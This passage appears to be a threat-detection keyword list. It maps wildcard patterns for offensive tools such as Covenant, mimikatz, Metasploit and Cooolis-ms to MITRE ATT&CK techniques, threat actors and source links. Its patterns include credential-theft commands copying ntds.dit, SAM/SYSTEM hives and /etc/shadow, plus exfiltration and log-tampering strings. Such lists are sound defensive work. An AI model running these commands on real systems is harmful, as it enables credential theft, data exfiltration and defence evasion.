- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-Shellcode*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-String.*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisVirtualAlloc*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*copy *\legit.sys *Windows\System32\Drivers\*.sys*,offensive_tool_keyword,unDefender,Killing your preferred antimalware by abusing native symbolic links and NT paths.,T1562.001 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/APTortellini/unDefender,1,0,N/A,10,4,309,78,2022-01-29T12:35:31Z,2021-08-21T14:45:39Z -*copy *\NTDS\ntds.dit *\Temp\*.*,greyware_tool_keyword,copy,the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.,T1003.001 - T1567.001 - T1070.004,TA0005 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*copy *NTDS\NTDS.dit*Temp*,greyware_tool_keyword,copy,copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all domain users,T1003.003,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*copy *sam.hive \\*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*copy *system.hive \\*,greyware_tool_keyword,reg,the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.,T1003.002,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*,offensive_tool_keyword,AD exploitation cheat sheet,Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Copy New *gdrive://www.googleapis.com/GS_Sync/*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*Copy New *sftp://*,greyware_tool_keyword,Goodsync,GoodSync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://www.goodsync.com/,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*CopyAndPasteEnum.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*CopyAndPasteFileDownloader.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*Copy-Item -Path * -Destination \\$IP\transfer*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Copyright (c) 2023 whoamianony.top*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*core/handler/reverse*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*core/sprayers/lync.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*core/teamserver/stagers/*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*CoreSecurity/impacket/*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Corrupted MAC on input*,greyware_tool_keyword,ssh,Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml,1,0,greyware tool - risks of False positive !,N/A,10,4099,1019,2023-08-09T15:42:59Z,2013-09-17T17:07:58Z -*corscanner -i urls.txt -t 100*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Could not set file modification time.*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Could not write NTLM Hashes to the specified JTR_Dump_Path *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*Couldn't clone GPO {} (maybe it does not exist?*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*couldn't handle sandbox event*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*Covenant.API*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.csproj*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.exe*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.Models*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant.sln*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant/Covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Covenant/wwwroot*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantAPI.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantAPIExtensions.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantBaseMenuItem.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantService.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUser.cs*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUserLogin.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUserLoginResult.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*CovenantUserRegister.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*covid19_koadic.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*cow-branded-longhorn.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*cowpatty -f *.txt -r *.cap -s *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Cowpatty*,offensive_tool_keyword,Cowpatty,coWPAtty - Brute-force dictionary attack against WPA-PSK.,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Network Exploitation tools,https://github.com/joswr1ght/cowpatty,1,1,N/A,N/A,2,152,34,2018-12-04T22:26:47Z,2017-08-14T20:33:22Z -*cowsay -f dragon 'PEzor!!*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*cp /etc/passwd*,greyware_tool_keyword,cp,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cp /etc/shadow /tmp/.*,offensive_tool_keyword,EQGR,Equation Group scripts and tools,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*cp /etc/shadow*,greyware_tool_keyword,cp,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*cp /var/log/audit/audit.log .tmp*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked note defense evasion,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*cp -i /bin/sh */crond*,greyware_tool_keyword,crond,Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.,T1036 - T1564.003 - T1059.004,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*cp sliver-* /opt/tools/bin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*cpp_test_payload.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of 